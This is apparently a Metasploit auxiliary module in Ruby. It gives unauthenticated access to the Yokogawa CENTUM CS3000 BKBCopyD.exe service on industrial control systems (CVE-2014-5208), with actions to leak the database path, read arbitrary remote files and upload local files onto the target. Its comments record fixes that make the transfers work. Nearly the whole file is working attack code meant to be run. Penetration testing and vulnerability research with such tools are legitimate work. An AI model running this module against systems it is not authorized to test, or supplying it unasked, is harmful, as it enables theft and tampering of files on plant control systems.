##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
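class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report

  # Reply-code patterns for the BKBCopyD.exe control channel. They are
  # anchored with \A (start of the reply) rather than ^ (start of any line)
  # so a matching code buried later in a multi-line reply is not mistaken
  # for success.
  PMODE_OK = /\A210/
  TRANSFER_OK = /\A150/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa BKBCopyD.exe Client',
        'Description' => %q{
          This module allows an unauthenticated user to interact with the Yokogawa
          CENTUM CS3000 BKBCopyD.exe service through the PMODE, RETR and STOR
          operations.
        },
        'Author' => [ 'Unknown' ],
        'References' => [
          ['CVE', '2014-5208'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/08/09/r7-2014-10-disclosure-yokogawa-centum-cs3000-bkbcopydexe-file-system-access']
        ],
        'Actions' => [
          ['PMODE', { 'Description' => 'Leak the current database' }],
          ['RETR', { 'Description' => 'Retrieve remote file' }],
          ['STOR', { 'Description' => 'Store remote file' }]
        ],
        'DisclosureDate' => '2014-08-09',
        'DefaultAction' => 'PMODE',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(20111),
        OptString.new('RPATH', [ false, 'The Remote Path (required to RETR and STOR)', '' ]),
        OptPath.new('LPATH', [ false, 'The Local Path (required to STOR)' ])
      ]
    )
  end

  # Local source port of the control connection. The embedded TCP server
  # (TcpServer mixin) later listens on this same port for the data
  # connection the service opens back to us.
  attr_reader :srvport

  # Auxiliary entry point; delegates to #exploit so the TcpServer flow
  # (which expects `super` from #exploit) is reused unchanged.
  def run
    exploit
  end

  # Drives the selected action. PMODE is a single request/reply exchange;
  # RETR and STOR first ask the service to open a data connection (reply
  # code 150) and then hand control to the TCP server via `super`.
  def exploit
    @srvport = rand(1024..65535)
    print_status(@srvport.to_s)
    # We make the client connection before giving control to the TCP Server
    # in order to release the src port, so the server can start correctly

    case action.name
    when 'PMODE'
      print_status('Sending PMODE packet...')
      res = send_pkt("PMODE MR_DBPATH\n")
      if res && res.match?(PMODE_OK)
        print_good("Success: #{res}")
      else
        print_error('Failed...')
      end
      return
    when 'RETR'
      return unless transfer_options_present?(need_local: false)
      return unless request_transfer('RETR')
    when 'STOR'
      return unless transfer_options_present?(need_local: true)
      return unless request_transfer('STOR')
    else
      print_error('Incorrect action')
      return
    end

    super # TCPServer :)
  end

  # Both options are declared optional so the PMODE action can run without
  # them; RETR/STOR cannot, so check here instead of sending an empty path
  # (or passing nil to File.binread in #on_client_connect).
  #
  # @param need_local [Boolean] whether LPATH is also required (STOR)
  # @return [Boolean] true when every required option is set
  def transfer_options_present?(need_local:)
    if datastore['RPATH'].blank?
      print_error('RPATH is required for this action')
      return false
    end
    if need_local && datastore['LPATH'].blank?
      print_error('LPATH is required for this action')
      return false
    end
    true
  end

  # Sends "<verb> <RPATH>" on the control channel.
  #
  # @param verb [String] 'RETR' or 'STOR'
  # @return [Boolean] true when the service answered with a 150 code, i.e.
  #   agreed to open the data connection back to @srvport
  def request_transfer(verb)
    print_status("Sending #{verb} packet...")
    res = send_pkt("#{verb} #{datastore['RPATH']}\n")
    res ? res.match?(TRANSFER_OK) : false
  end

  # Opens the control connection from the fixed source port @srvport,
  # writes one request line and returns the first reply read (nil when
  # nothing arrives). The socket is always torn down so the source port is
  # free for the server to bind afterwards.
  #
  # @param data [String] request line, newline-terminated
  # @return [String, nil] raw reply from the service
  def send_pkt(data)
    connect(true, { 'CPORT' => @srvport })
    sock.put(data)
    sock.get_once
  ensure
    disconnect
  end

  # Data-connection callback. For STOR the local file is pushed to the
  # service as soon as it connects back; RETR waits for #on_client_data.
  def on_client_connect(client)
    return unless action.name == 'STOR'

    # File.new does not yield to a block, so the previous
    # `File.new(path, 'rb') { |f| contents = f.read }` never ran its block
    # and an empty body was sent. binread reads the whole file in binary
    # mode and closes it.
    contents = File.binread(datastore['LPATH'])
    print_status("#{client.peerhost} - Sending data...")
    client.put(contents)
    service.close
    service.stop
  end

  # Data-connection callback for RETR: the first chunk creates the loot
  # file, later chunks are appended to it. The parameter must be used by
  # name here — the previous body referenced an undefined `c`, which raised
  # NameError on the first chunk.
  def on_client_data(client)
    print_status("#{client.peerhost} - Getting data...")
    data = client.get_once
    return unless data

    if @store_path.blank?
      # RPATH is the only registered remote-path option (see
      # register_options); the former datastore['PATH'] was never
      # registered, so the loot filename hint was always nil.
      @store_path = store_loot('yokogawa.cs3000.file', 'application/octet-stream', rhost, data, datastore['RPATH'])
      print_good("#{@store_path} saved!")
    else
      File.open(@store_path, 'ab') { |f| f.write(data) }
      print_good("More data on #{@store_path}")
    end
  end

  # Stops the embedded server once the data connection is closed.
  def on_client_close(_client)
    cleanup_service
  end
end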